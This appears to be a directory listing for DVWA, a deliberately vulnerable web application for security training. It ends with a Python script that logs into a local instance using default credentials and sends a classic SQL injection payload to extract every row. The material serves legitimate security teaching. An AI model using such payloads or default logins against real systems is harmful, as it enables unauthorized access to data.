DVWA: Deliberately vulnerable web application for security training

PHP/MariaDB training platform for web security exploitation practice.

Rankings: overall #196, security #18. Stars: 12.6K (+50 in 7 days). Forks: 4.6K (+26 in 7 days).
Learn more about DVWA

DVWA is a PHP-based web application backed by MariaDB that contains documented and undocumented security vulnerabilities across multiple difficulty levels. The application runs on standard web server stacks like XAMPP and is designed to be deployed in isolated environments such as virtual machines with NAT networking. It implements common web vulnerabilities including SQL injection, cross-site scripting, authentication bypass, and other OWASP-related issues with adjustable complexity settings. The tool serves as a practice platform for security professionals, developers learning secure coding practices, and students in classroom settings studying web application security.

DVWA

1. Adjustable Difficulty Levels

Vulnerabilities scale across multiple difficulty settings from low to high complexity. Enables progressive learning paths for beginners through advanced security practitioners without requiring separate environments.

2. Undocumented Vulnerability Discovery

Contains intentional security flaws beyond the documented exercises, requiring active reconnaissance and analysis. Simulates real-world penetration testing scenarios where not all vulnerabilities are explicitly cataloged.

3. Isolated Deployment Model

Designed to run only in isolated, VM-based environments with explicit network isolation requirements. Clear deployment constraints and security warnings guard against accidental internet exposure of the vulnerable code.


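import re
import requests

BASE = 'http://localhost/DVWA'  # local, isolated DVWA instance

# Test SQL injection vulnerability (the DVWA security level must be set to low)
session = requests.Session()

# The DVWA login form carries a per-session anti-CSRF token (user_token); send it back if present
login_page = session.get(f'{BASE}/login.php', timeout=10)
token = re.search(r"name='user_token'\s+value='([^']+)'", login_page.text)
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
if token:
    login_data['user_token'] = token.group(1)
session.post(f'{BASE}/login.php', data=login_data, timeout=10)

# Exploit SQLi to extract data: the always-true condition makes the query return every row
payload = "1' OR '1'='1"
response = session.get(f'{BASE}/vulnerabilities/sqli/', params={'id': payload, 'Submit': 'Submit'}, timeout=10)
print(response.text)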

